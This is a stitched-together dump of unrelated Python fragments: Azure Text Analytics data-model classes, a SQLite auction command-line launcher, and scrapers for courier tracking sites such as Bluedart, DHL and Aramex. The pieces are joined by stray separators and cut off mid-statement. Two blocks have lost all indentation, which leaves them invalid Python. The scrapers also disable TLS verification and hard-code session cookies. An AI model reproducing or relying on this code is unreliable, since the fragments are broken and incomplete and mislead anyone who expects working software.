            setattr(self, field, kwargs.get(field, None))

    def __repr__(self):
        formatted = "DetectLanguageInput(id={}, text={}, country_hint={})".format(
            self.id, self.text, self.country_hint)
        return formatted[:1024]
class LinkedEntity(DictMixin):
    """A well-known entity recognized in text, linked to a data source
    such as Wikipedia or Bing, together with every match of the entity
    found in the document.

    Attributes:
        name (str): Entity Linking formal name.
        matches (list[~azure.ai.textanalytics.LinkedEntityMatch]):
            Instances of this entity appearing in the text.
        language (str): Language used in the data source.
        data_source_entity_id (str): Unique identifier of the recognized
            entity from the data source.
        url (str): URL to the entity's page from the data source.
        data_source (str): Data source used to extract entity linking,
            such as Wiki/Bing etc.
    """

    def __init__(self, **kwargs):
        for field in ("name", "matches", "language",
                      "data_source_entity_id", "url", "data_source"):
            setattr(self, field, kwargs.get(field, None))

    @classmethod
    def _from_generated(cls, entity):
        # pylint: disable=protected-access
        linked_matches = [LinkedEntityMatch._from_generated(m)
                          for m in entity.matches]
        return cls(
            name=entity.name,
            matches=linked_matches,
            language=entity.language,
            data_source_entity_id=entity.id,
            url=entity.url,
            data_source=entity.data_source,
        )

    def __repr__(self):
        template = ("LinkedEntity(name={}, matches={}, language={}, "
                    "data_source_entity_id={}, url={}, data_source={})")
        return template.format(self.name, repr(self.matches), self.language,
                               self.data_source_entity_id, self.url,
                               self.data_source)[:1024]
class LinkedEntityMatch(DictMixin):
    """One occurrence of a linked entity in the text, with the prediction
    confidence and the location of the match.

    Attributes:
        score (float): Confidence level between 0 and 1 when a well-known
            item is recognized.
        text (str): Entity text as it appears in the request.
        grapheme_offset (int): Start position (in Unicode characters) of
            the entity match text.
        grapheme_length (int): Length (in Unicode characters) of the
            entity match text.
    """

    def __init__(self, **kwargs):
        for field in ("score", "text", "grapheme_offset", "grapheme_length"):
            setattr(self, field, kwargs.get(field, None))

    @classmethod
    def _from_generated(cls, match):
        # The generated model calls these offset/length; expose them under
        # the public grapheme_* names.
        return cls(score=match.score,
                   text=match.text,
                   grapheme_offset=match.offset,
                   grapheme_length=match.length)

    def __repr__(self):
        return ("LinkedEntityMatch(score={}, text={}, grapheme_offset={}, grapheme_length={})"
                .format(self.score, self.text, self.grapheme_offset,
                        self.grapheme_length)[:1024])
class TextDocumentInput(MultiLanguageInput):
    """A single document to be analyzed by the service.

    Attributes:
        id (str): Required. A unique, non-empty document identifier.
        text (str): Required. The input text to process.
        language (str): 2-letter ISO 639-1 language code, e.g. "en" for
            English, "es" for Spanish. Defaults to "en" when not set.
    """

    def __init__(self, **kwargs):
        super(TextDocumentInput, self).__init__(**kwargs)
        for field in ("id", "text", "language"):
            setattr(self, field, kwargs.get(field, None))

    def __repr__(self):
        formatted = "TextDocumentInput(id={}, text={}, language={})".format(
            self.id, self.text, self.language)
        return formatted[:1024]
class TextDocumentBatchStatistics(DictMixin):
    """Statistics about the whole request payload. Note: this object is not
    returned in the response body and must be retrieved by a response hook.

    Attributes:
        document_count (int): Number of documents submitted in the request.
        valid_document_count (int): Number of valid documents (excludes
            empty, over-size-limit or unsupported-language documents).
        erroneous_document_count (int): Number of invalid documents
            (includes empty, over-size-limit or unsupported-language
            documents).
        transaction_count (long): Number of transactions for the request.
    """

    def __init__(self, **kwargs):
        for field in ("document_count", "valid_document_count",
                      "erroneous_document_count", "transaction_count"):
            setattr(self, field, kwargs.get(field, None))

    @classmethod
    def _from_generated(cls, statistics):
        # Statistics are optional on the wire.
        if statistics is None:
            return None
        return cls(
            document_count=statistics["documentsCount"],
            valid_document_count=statistics["validDocumentsCount"],
            erroneous_document_count=statistics["erroneousDocumentsCount"],
            transaction_count=statistics["transactionsCount"],
        )

    def __repr__(self):
        template = ("TextDocumentBatchStatistics(document_count={}, "
                    "valid_document_count={}, erroneous_document_count={}, "
                    "transaction_count={})")
        return template.format(self.document_count, self.valid_document_count,
                               self.erroneous_document_count,
                               self.transaction_count)[:1024]
class SentenceSentiment(DictMixin):
"""SentenceSentiment contains the predicted sentiment and
confidence scores for each individual sentence in the document.
:param sentiment: The predicted Sentiment for the sentence.
Possible values include: 'positive', 'neutral', 'negative'
:type sentiment: str
:param confidence_scores: The sentiment confidence score between 0
and 1 for the sentence for all labels.
:type confidence_scores:
~azure.ai.textanalytics.SentimentConfidenceScores
:param grapheme_offset: The sentence offset from the start of the
document.
:type grapheme_offset: int
:param grapheme_length: The length of the sentence by Unicode standard.
:type grapheme_length: int
:param warnings: The warnings generated for the sentence.
:type warnings: list[str]
"""
def __init__(self, **kwargs):
self.sentiment = kwargs.get("sentiment", None)
self.confidence_scores = kwargs.get("confidence_scores", None)
self.grapheme_offset = kwargs.get("grapheme_offset", None)
self.grapheme_length = kwargs.get("grapheme_length", None)
self.warnings = | |
# Launcher.py
import sqlite3
import time
import hashlib
from os import system, name
import getpass
import re
import traceback
import random
import string
connection = None
cursor = None
LoggedUser = None
LoggedUserName = None
def randomString(stringLength=10):
    """Generate a random string of fixed length """
    alphabet = string.ascii_lowercase
    return ''.join(random.choice(alphabet) for _ in range(stringLength))
def clear():
    """Clear the terminal, using the right command for the platform."""
    # os.name is 'nt' on Windows; mac/linux report 'posix' and use 'clear'.
    command = 'cls' if name == 'nt' else 'clear'
    _ = system(command)
def connect(path):
    """Open the SQLite database at *path* and initialise module globals.

    Sets the module-level ``connection`` and ``cursor`` used by every other
    function, enables foreign-key enforcement, and installs sqlite3.Row as
    the row factory so fetched rows support ``.keys()`` — the table-printing
    code throughout this module (``rows[0].keys()``) relies on that.

    Returns None.
    """
    global connection, cursor
    connection = sqlite3.connect(path)
    # Rows must behave like mappings for the table printers; set this
    # before creating the cursor so the cursor inherits it.
    connection.row_factory = sqlite3.Row
    cursor = connection.cursor()
    # Fix: the pragma was misspelled 'forteign_keys'; SQLite silently
    # ignores unknown pragmas, so foreign keys were never enforced.
    cursor.execute(' PRAGMA foreign_keys=ON; ')
    connection.commit()
    return
def define_tables(path="/home/manzi/Desktop/CMPUT291Mini-Project1/prj-tables.sql"):
    """Create the schema by executing the SQL script at *path*.

    *path* defaults to the original hard-coded location, so existing
    callers are unaffected, but it can now be overridden (e.g. in tests).
    Fix: the file handle was previously never closed; a with-block now
    guarantees it is released.

    Returns None.
    """
    global connection, cursor
    with open(path, "r") as tables:
        contents = tables.read()
    cursor.executescript(contents)
    connection.commit()
    return
def insert_data(path="/home/manzi/Desktop/CMPUT291Mini-Project1/test_data.sql"):
    """Load test data by executing the SQL script at *path*.

    *path* defaults to the original hard-coded location, so existing
    callers are unaffected, but it can now be overridden (e.g. in tests).
    Fix: the file handle was previously never closed; a with-block now
    guarantees it is released.

    Returns None.
    """
    global connection, cursor
    with open(path, "r") as datafile:
        contents = datafile.read()
    cursor.executescript(contents)
    connection.commit()
    return
def saleFunctions(sale):
    """Show one sale's details and offer bid / list-sales / list-reviews actions.

    Parameters:
        sale: the sale id (sid) to display; matched case-insensitively.

    NOTE(review): the table-printing code calls rows[0].keys(), which only
    works when connection.row_factory is sqlite3.Row — confirm connect()
    sets it, otherwise fetchall() returns plain tuples and this crashes.
    NOTE(review): option '2' recurses back into saleFunctions for a
    selected sale; deep drill-downs grow the call stack.
    """
    global connection, cursor, LoggedUser, LoggedUserName
    clear()
    # Sale summary. First UNION arm: sales that have bids (shows MAX bid);
    # second arm: sales with no bids at all (shows reserve price instead).
    # Both join the lister's reviews to show their review count and rating.
    cursor.execute(''' SELECT s.lister, s.descr, s.edate, s.cond, MAX(b.amount), COUNT(r.reviewee) AS Num_Rev, AVG(r.rating)
        FROM sales s, bids b, reviews r
        WHERE b.sid = s.sid AND s.lister = r.reviewee AND lower(s.sid) = :usale
        GROUP BY s.lister, s.descr, s.edate, s.cond
        UNION
        SELECT s.lister, s.descr, s.edate, s.cond, s.rprice, COUNT(r.reviewee), AVG(r.rating)
        FROM sales s, bids b, reviews r
        WHERE lower(s.sid) = :usale AND b.sid = s.sid AND s.lister = r.reviewee AND s.sid NOT IN (SELECT b.sid FROM bids b)
        GROUP BY s.lister, s.descr, s.edate, s.cond;
        ''', {"usale":sale})
    rows = cursor.fetchall()
    print("SALE DESCRIPTION:\n")
    # Print the table: header row from column names, then numbered rows.
    print()
    print()
    print("   ", end = "")
    for key in rows[0].keys():
        print(key, end = "\t\t")
    print()
    for i in range(1, len(rows) + 1):
        print(str(i) + ") " , end = "")
        for item in rows[i-1]:
            print(item, end = "\t\t")
        print()
    print()
    print()
    print("PRODUCT DESCRIPTION:\n")
    # Product linked to this sale, with its review count and average rating.
    cursor.execute(''' SELECT p.pid, p.descr, COUNT(DISTINCT pr.rid) AS Num_Rev, AVG(pr.rating)
        FROM products p, previews pr, sales s
        WHERE pr.pid = p.pid AND s.pid = p.pid AND s.sid = :usale
        GROUP BY p.pid, p.descr;
        ''',{"usale":sale})
    rows = cursor.fetchall()
    if(not(rows)):
        print("Product hasn't been reviewed yet!\n")
    else:
        # Print the table (same layout as above).
        print()
        print()
        print("   ", end = "")
        for key in rows[0].keys():
            print(key, end = "\t\t")
        print()
        for i in range(1, len(rows) + 1):
            print(str(i) + ") " , end = "")
            for item in rows[i-1]:
                print(item, end = "\t\t")
            print()
        print()
        print()
    uchoice = input("Please select one of the following options:\n 1) Place a bid \n 2) List Sales of Seller \n 3) List all reviews of the seller \n 4) Go back ")
    if(uchoice == '4'):
        return
    elif(uchoice == '1'):
        # Place a bid: must exceed the current maximum bid on this sale.
        cursor.execute("SELECT MAX(amount) FROM bids WHERE sid = :usale;", {"usale":sale})
        row = cursor.fetchone()
        print(row[0])
        while(True):
            amount = input("Enter bid ammount: ")
            try:
                amount = float(amount)
            except ValueError:
                print("Invalid Input!")
                continue
            if(amount > row[0]):
                break
            else:
                print("Bid amount can't be less than the current maximum bid!\n")
        # Generate a random bid id, retrying until it is unused.
        while(True):
            bid = randomString(20)
            cursor.execute("SELECT bid FROM bids WHERE bid = :ubid;", {"ubid": bid})
            rows = cursor.fetchall()
            if(not(rows)):
                cursor.execute("INSERT INTO bids VALUES (:ubid, :ubidder, :usid, datetime('now'), :uamount);", {"ubid": bid, "ubidder": LoggedUser, "usid": sale, "uamount":amount})
                connection.commit()
                break
            else:
                continue
    elif(uchoice == '2'):
        # List this seller's active sales, soonest-ending first; the user
        # may drill into one (recursive call) or go back.
        cursor.execute("SELECT lister FROM sales WHERE sid = :usale;",{"usale": sale})
        row = cursor.fetchone()
        lister = row[0]
        # The cast(...) expressions decompose the time remaining until the
        # sale's end date into whole Days / Hours / Minutes for display.
        cursor.execute(''' SELECT s.sid, s.descr, MAX(b.amount), cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
            FROM sales s, bids b
            WHERE s.lister = :ulister AND s.sid = b.sid AND s.edate > datetime('now')
            GROUP BY s.sid, s.descr
            UNION
            SELECT s.sid, s.descr, s.rprice, cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
            FROM sales s
            WHERE s.lister = :ulister AND s.sid NOT IN (SELECT b.sid FROM bids b)
            GROUP BY s.sid, s.descr
            ORDER BY Days, Hours, Minutes;
            ''',{"ulister":lister})
        rows = cursor.fetchall()
        # Print the table.
        print()
        print()
        print("   ", end = "")
        for key in rows[0].keys():
            print(key, end = "\t\t")
        print()
        for i in range(1, len(rows) + 1):
            print(str(i) + ") " , end = "")
            for item in rows[i-1]:
                print(item, end = "\t\t")
            print()
        print()
        print()
        while(True):
            uchoice = input("Select a Sale or enter 'b' to go back... ")
            if(uchoice == 'b' or uchoice == 'B'):
                break
            try:
                uchoice = int(uchoice)
            except ValueError:
                print("Not a number!")
                continue
            if(uchoice > 0 and uchoice < len(rows) + 1):
                selectedSale = rows[uchoice - 1][0]
                saleFunctions(selectedSale)
            else:
                print("\nInvalid Response!\n")
    elif(uchoice == '3'):
        # List every review written about this sale's lister.
        cursor.execute("SELECT lister FROM sales WHERE sid = :usale;",{"usale": sale})
        row = cursor.fetchone()
        lister = row[0]
        cursor.execute("SELECT * FROM reviews WHERE reviewee = :ulister; ", {"ulister": lister})
        rows = cursor.fetchall()
        # Print the table.
        print()
        print()
        print("   ", end = "")
        for key in rows[0].keys():
            print(key, end = "\t\t")
        print()
        for i in range(1, len(rows) + 1):
            print(str(i) + ") " , end = "")
            for item in rows[i-1]:
                print(item, end = "\t\t")
            print()
        print()
        print()
def ListProductsMoreFeatures(pid, productName):
global connection, cursor, LoggedUser, LoggedUserName
while(True):
clear()
userchoice = input(" Product Selected: %s\n Select one of the following options:\n 1) Write a review for this product \n 2) List all reviews for this product \n 3) List all active sales associated to this product\n 4) Go back to Product Listing " % productName)
if(userchoice == '1'):
while(True):
reviewText = input("\nType a review: \n")
if(reviewText == ""):
print("Review Can't be empty!")
continue
else:
break
while(True):
rating = input("Enter a rating from 1 to 5 inclusive: ")
try:
rating = float(rating)
except ValueError:
print("\nThat's not a number!\n")
continue
if(rating < 1 or rating >5):
print("Invalid Rating!")
continue
else:
break
cursor.execute("SELECT MAX(rid) FROM previews;")
row = cursor.fetchone()
rid = None
while(True):
rid = row[0] + 1
cursor.execute("SELECT rid FROM previews WHERE rid = :urid;", {"urid": rid})
rows = cursor.fetchall()
if(not(rows)):
break
else:
continue
cursor.execute("INSERT INTO previews VALUES (:urid, :upid, :ureviewer, :urating, :urtext, datetime('now'));", {"urid": rid, "upid": pid, "ureviewer": LoggedUser, "urating": rating, "urtext": reviewText})
connection.commit()
elif(userchoice == '2'):
pid = pid.lower()
cursor.execute("SELECT rid, reviewer, rtext, rdate FROM previews WHERE lower(pid) = :upid;", {"upid": pid})
rows = cursor.fetchall()
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
a = input("Press 'Enter' to go back...")
if(a):
pass
elif(userchoice == '3'):
pid = pid.lower()
cursor.execute(''' SELECT s.sid, s.descr, MAX(b.amount), cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
FROM sales s, bids b
WHERE lower(s.pid) = :pid AND s.sid = b.sid AND s.edate > datetime('now')
GROUP BY s.sid, s.descr
UNION
SELECT s.sid, s.descr, s.rprice, cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
FROM sales s
WHERE lower(s.pid) = :pid AND s.sid NOT IN (SELECT b.sid FROM bids b)
GROUP BY s.sid, s.descr
ORDER BY Days, Hours, Minutes;
''',{"pid":pid})
rows = cursor.fetchall()
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
while(True):
uchoice = input("Select a Sale or enter 'b' to go back... ")
if(uchoice == 'b' or uchoice == 'B'):
return
try:
uchoice | |
from bs4 import BeautifulSoup
import requests
from datetime import datetime
from selenium import webdriver
from time import sleep
from dateutil.parser import parse
__author__ = '<NAME>'
class Tracker(object):
    '''
    Common base for the shipment trackers below.

    Attributes:
        tracking_no: Tracking number of the shipment (stored as str).
        page: Raw HTML data of the fetched page (None until Get_Page runs).
        tracking_data: List of checkpoint dicts for the shipment.
        status: The current/overall status of the shipment.
    '''

    def __init__(self, tracking_no):
        '''
        Store the tracking number and reset all scrape state.
        '''
        self.tracking_no = str(tracking_no)
        self.status = None
        self.tracking_data = []
        self.page = None

    def Get_Tracking_Data(self):
        '''
        Template method: fetch the page, then parse its checkpoints.
        Subclasses supply Get_Page and Extract_Checkpoints.
        '''
        self.Get_Page()
        self.Extract_Checkpoints()
class BluedartTracker(Tracker):
    '''
    This class scrapes tracking data from the Bluedart website.
    '''

    # Header/placeholder strings that must not be kept as checkpoint cells.
    exclude_list = ['Location', 'Date', 'Waybill', 'Details', 'No.']

    def __init__(self, tracking_no):
        Tracker.__init__(self, tracking_no)

    def Get_Page(self):
        '''
        Fetches raw HTML data from the site for a given tracking_no.
        '''
        url = 'http://www.bluedart.com/servlet/RoutingServlet'
        data = {'handler': 'tnt',
                'action': 'awbquery',
                'awb': 'awb',
                'numbers': self.tracking_no}
        # NOTE(review): verify=False disables TLS certificate checking;
        # left as-is (endpoint is plain HTTP) but worth revisiting.
        response = requests.post(url, data=data, verify=False)
        # Fix: store the decoded text rather than response.content (bytes),
        # so the `'...' in self.page` substring checks in
        # Extract_Checkpoints also work on Python 3.
        self.page = response.text

    def is_valid(self, text):
        '''Return False for None cells or cells containing header keywords.'''
        if text is None:
            return False
        return not any(unwanted in text for unwanted in self.exclude_list)

    def Extract_Checkpoints(self):
        '''
        Extract the checkpoints and store them in self.tracking_data,
        sorted chronologically. Also sets self.status.
        '''
        # Make sure the page was fetched first.
        if self.page is None:
            raise Exception("The HTML data was not fetched due to some reasons")
        # Check for an invalid tracking number.
        if 'Numbers Not Found -' in self.page or 'Invalid Query Numbers -' in self.page:
            raise ValueError('The Tracking number is invalid')
        soup = BeautifulSoup(self.page, 'html.parser')
        # Assign the current status of the shipment.
        if 'Returned To Origin' in self.page:  # prioritise RTO over delivered
            self.status = 'R'
        elif 'SHIPMENT DELIVERED' in self.page:
            self.status = 'C'
        else:  # the shipment is in transit
            self.status = 'T'
        # Collect the relevant checkpoint cells (left-aligned, size-1 font).
        cells = []
        for cell in soup.findAll('td', {"align": "LEFT"}):
            if cell.font["size"] == '1':
                cell_text = cell.font.string
                if self.is_valid(cell_text):
                    cells.append(cell_text)
        # Fix: xrange is Python 2 only; range behaves identically here.
        # 4 cells per row: Location -- Status -- Date -- Time.
        rows = [cells[start:start + 4] for start in range(0, len(cells), 4)]
        date_time_format = "%d-%b-%Y %H:%M"  # hoisted loop invariant
        for row in rows:
            location = row[0]
            status = row[1]
            # Merge the date and time columns into one datetime.
            date_time = datetime.strptime(' '.join((row[2], row[3])),
                                          date_time_format)
            self.tracking_data.append(
                {'status': status, 'date': date_time, 'location': location})
        # Sort the checkpoints by date and time --- callers rely on this.
        self.tracking_data.sort(key=lambda checkpoint: checkpoint['date'])
class AramexTracker(Tracker):
    '''
    This class scrapes data from the Aramex website
    '''
    def __init__(self, tracking_no):
        Tracker.__init__(self, tracking_no)
    def wait_till_page_load(self, driver, max_wait_time):
        '''
        Pause execution until the page is loaded fully, including data
        delayed by JavaScript, waiting at most max_wait_time seconds.

        Raises Exception if the page does not finish loading in time.
        '''
        sleep_count = max_wait_time  # wait for a fixed max_wait_time only
        # A page that's fully loaded has the words 'Current Status'
        while 'Current Status' not in driver.page_source:
            sleep(1)
            sleep_count -= 1
            # BUGFIX: the original used "sleepCount is 0" -- an identity
            # comparison, which is not a reliable numeric equality test.
            if sleep_count <= 0:
                raise Exception('Request timed out!')  # max_wait_time exceeded!
    def remove_non_ascii(self, str_to_clean):
        '''Strip every non-ASCII character from str_to_clean.'''
        return ''.join([x for x in str_to_clean if ord(x) < 128])
    def Get_Page(self):
        '''
        Fetches raw HTML data from the site for a given tracking_no
        '''
        # Simply encode the correct url as a string
        url = 'https://www.aramex.com/express/track-results-multiple.aspx?ShipmentNumber='
        url += self.tracking_no
        driver = webdriver.PhantomJS()        # create a selenium webdriver
        driver.get(url)                       # make it send a request with the above url
        self.wait_till_page_load(driver, 10)  # wait till the page is fully loaded
        self.page = driver.page_source        # store the html source
        driver.quit()                         # stop the webdriver
    def Extract_Checkpoints(self):
        '''
        Extract the checkpoints and store in self.tracking_data
        '''
        # Make sure page is available
        if self.page is None:
            raise Exception("The HTML data was not fetched due to some reasons")
        # Check for invalid tracking number
        if 'Invalid number / data not currently available' in self.page:
            raise ValueError('Invalid number/data not currently available')
        # Checkpoints extraction begins here
        soup = BeautifulSoup(self.page, 'html.parser')
        # Assign the current status of the shipment - self.status
        current_status = soup.find('span', id='spnCurrentStatusValue').text.strip()
        if current_status == 'Supporting Document Returned to Shipper':
            self.status = 'R'
        elif current_status == 'Delivered':
            self.status = 'C'
        else:  # The shipment is in Transit
            self.status = 'T'
        # Get all rows of the Checkpoints table (no particular order)
        rows = soup.findAll('div', {'class': 'fullWidth odd leftFloat bottomGreyBorder'})
        rows += soup.findAll('div', {'class': 'fullWidth even leftFloat bottomGreyBorder'})
        for row in rows:
            # Get the data
            location = row.find('div', {'class': 'leftFloat thirdWidth'}).string.strip()
            date_time = row.find('div', {'class': 'leftFloat shipmentSummaryLabel'}).string.strip()
            status = row.find('div', {'class': 'leftFloat shipmentHistoryActivityLabel'}).string.strip()
            # Clean it (the site mixes in non-ASCII whitespace characters)
            location = self.remove_non_ascii(location)
            date_time = parse(self.remove_non_ascii(date_time))
            status = self.remove_non_ascii(status)
            # Add it to the checkpoint list
            self.tracking_data.append({'status': status, 'date': date_time, 'location': location})
        # Sort the checkpoints based on Date and Time --- this is important
        self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class DHLTracker(Tracker):
    '''
    This class scrapes data from the DHL website
    '''
    def __init__(self, tracking_no):
        Tracker.__init__(self, tracking_no)
    def wait_till_page_load(self, driver, max_wait_time):
        '''
        Pause execution until the page is loaded fully, including data
        delayed by JavaScript, waiting at most max_wait_time seconds.

        Raises Exception if the page does not finish loading in time.
        '''
        sleep_count = max_wait_time  # wait for a fixed max_wait_time only
        # The page is ready once it shows our tracking number or an error.
        while self.tracking_no not in driver.page_source and 'Invalid Input' not in driver.page_source:
            sleep(1)
            sleep_count -= 1
            # BUGFIX: the original used "sleepCount is 0" -- an identity
            # comparison, which is not a reliable numeric equality test.
            if sleep_count <= 0:
                raise Exception('Request timed out!')  # max_wait_time exceeded!
    def Get_Page(self):
        '''
        Fetches raw HTML data from the site for a given tracking_no
        '''
        # Simply encode the correct url as a string
        url = 'http://www.dhl.co.in/en/express/tracking.html?AWB={}&brand=DHL'.format(self.tracking_no)
        driver = webdriver.PhantomJS()        # create a selenium webdriver
        driver.get(url)                       # make it send a request with the above url
        self.wait_till_page_load(driver, 10)  # wait till the page is fully loaded
        self.page = driver.page_source        # store the html source
        driver.quit()                         # stop the webdriver
    def Extract_Checkpoints(self):
        '''
        Extract the checkpoints and store in self.tracking_data
        '''
        # Make sure page is available
        if self.page is None:
            raise Exception("The HTML data was not fetched due to some reasons")
        soup = BeautifulSoup(self.page, 'html.parser')
        # Check for invalid tracking number by checking if table element is present
        if soup.find('thead') is None:
            raise ValueError('Invalid tracking number')
        # Assign the current status of the shipment - self.status
        if 'Returned' in self.page:
            self.status = 'R'
        elif 'Signed for by:' in self.page:
            self.status = 'C'
        else:  # The shipment is in Transit
            self.status = 'T'
        # The full checkpoints table: each <thead> carries the date that
        # applies to the <tbody> checkpoint rows following it.
        table = soup.find('table', {'class': 'result-checkpoints'}).contents
        cur_date = None  # The date of the next few checkpoints, initially None
        for element in table:
            if element.name == 'thead':
                # This has the date for the next few checkpoints
                cur_date = element.find('th', {'colspan': '2'}).string.strip() + ' '
            elif element.name == 'tbody':
                # A checkpoint whose date = cur_date
                checkpoint = {'status': '', 'date': cur_date, 'location': ''}
                tds = element.findAll('td')
                checkpoint['status'] = tds[1].string.strip()
                checkpoint['location'] = tds[2].string.strip()
                checkpoint['date'] += tds[3].string.strip()
                checkpoint['date'] = parse(checkpoint['date'])
                self.tracking_data.append(checkpoint)
        self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class Skynet_Tracker(Tracker):
    '''
    This class scrapes tracking data from the Skynet website.
    '''
    def __init__(self,tracking_no):
        Tracker.__init__(self,tracking_no)
    def Get_Page(self):
        '''
        Fetches raw HTML data from the site for a given tracking_no
        '''
        url = 'https://www.skynetwwe.info/ShipmentTrackSingle.aspx?textfield={}&radiobutton=SB'.format(self.tracking_no)
        # NOTE(review): this hard-codes a specific ASP.NET session cookie --
        # presumably required by the site; confirm it still works once the
        # session expires.
        headers = {
            'Host': 'www.skynetwwe.info',
            'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'DNT': '1',
            'Cookie': 'ASP.NET_SessionId=aletb2fx1kqixq55kmblbvn4',
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0'
        }
        # request the server for the HTML data
        # NOTE(review): verify=False disables TLS certificate verification.
        response = requests.post(url,headers=headers,verify=False)
        self.page = response.content
    def Extract_Checkpoints(self):
        '''
        Extract the checkpoints and store in self.tracking_data
        '''
        # Make sure page is available
        if self.page is None:
            raise Exception("The HTML data was not fetched due to some reasons")
        soup = BeautifulSoup(self.page,'html.parser')
        # The site reports bad tracking numbers in this specific error span.
        invalid_tracking_no = soup.find('span',{'id':'ctl00_ContentPlaceHolder1_lblsMsg','class':'ErrorMessage','style':'font-family:Calibri;font-size:9pt;font-weight:bold;','name':'lblsMsg'})
        if invalid_tracking_no is not None:
            raise ValueError('The Tracking number is invalid')
        # Assign the current status of the shipment
        if 'Delivered' in self.page:
            self.status = 'C'
        else: # The shipment is in Transit
            self.status = 'T'
        # Checkpoints extraction begins here: the table alternates between
        # 'gridItem' and 'gridAltItem' row classes.
        rows = soup.findAll('tr',{'class':'gridItem'}) + soup.findAll('tr',{'class':'gridAltItem'})
        for row in rows:
            '''
            Each row will have 4 columns: Date--Time--Status--Location
            Merge column one and two and format it.
            Append to tracking_data list
            '''
            row_cells = row.findAll('td')
            date = row_cells[0].string.strip()
            time = row_cells[1].string.strip()
            date_time = ' '.join([date,time])
            date_time_format = "%d %b %Y %H:%M"
            date_time = datetime.strptime(date_time,date_time_format)
            status = row_cells[2].string.strip()
            location = row_cells[3].string.strip()
            self.tracking_data.append({'status':status,'date':date_time,'location':location})
        # Sort the checkpoints based on Date and Time --- this is important
        self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class Overnite_Tracker(Tracker):
    '''
    This class scrapes tracking data from the Overnite express website.
    '''
    def __init__(self, tracking_no):
        Tracker.__init__(self, tracking_no)
    def Get_Page(self):
        '''
        Fetches raw HTML data from the site for a given tracking_no.

        The site is an ASP.NET form, so the POST carries the usual
        __VIEWSTATE/__EVENTVALIDATION fields plus the AWB number.
        '''
        url = 'http://www.overnitenet.com/Web-Track.aspx'
        data = {
            '__EVENTTARGET':'',
            '__EVENTARGUMENT':'',
            '__VIEWSTATE':'/<KEY>',
            '__EVENTVALIDATION':'/<KEY>',
            'ctl00$Content$rb':'rdAwbNo',
            'ctl00$Content$txtAWB':self.tracking_no,
            'ctl00$Content$ValidatorCalloutExtender6_ClientState':'',
            'ctl00$Content$imgbtnTrack.x':'28',
            'ctl00$Content$imgbtnTrack.y':'8'
        }
        # NOTE(review): the session cookie is hard-coded -- presumably
        # required by the site; confirm it still works once it expires.
        headers = {
            'Host': 'www.overnitenet.com',
            'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'DNT': '1',
            'Referer': 'http://www.overnitenet.com/Web-Track.aspx',
            'Cookie': 'ASP.NET_SessionId=3ncsag55xq0z4vqltg3egbr4',
            'Connection': 'keep-alive'
        }
        # request the server for the HTML data
        # NOTE(review): verify=False disables TLS certificate verification.
        response = requests.post(url, data=data, headers=headers, verify=False)
        self.page = response.content
    def Extract_Checkpoints(self):
        '''
        Extract the checkpoints and store in self.tracking_data
        '''
        # Make sure page is available
        if self.page is None:
            raise Exception("The HTML data was not fetched due to some reasons")
        soup = BeautifulSoup(self.page, 'html.parser')
        if 'Delivery information not found' in self.page:
            raise ValueError('The Tracking number is invalid/Tracking number is over 45 days old.')
        # Assign the current status of the shipment
        if 'Delivered on' in self.page:
            self.status = 'C'
        else:  # The shipment is in Transit
            self.status = 'T'
        # Checkpoints extraction begins here: the second matching table holds
        # the checkpoint rows; skip its header row.
        table = soup.findAll('table', {'cellpadding': '1', 'cellspacing': '1', 'border': '1', 'align': 'center', 'style': "width:800px;border-color:#034291;"})[1]
        rows = table.findAll('tr')[1:]
        for row in rows:
            '''
            Each row will have 3 columns: Date--Location--Status
            '''
            row_cells = row.findAll('td')
            date = row_cells[0].string.strip()
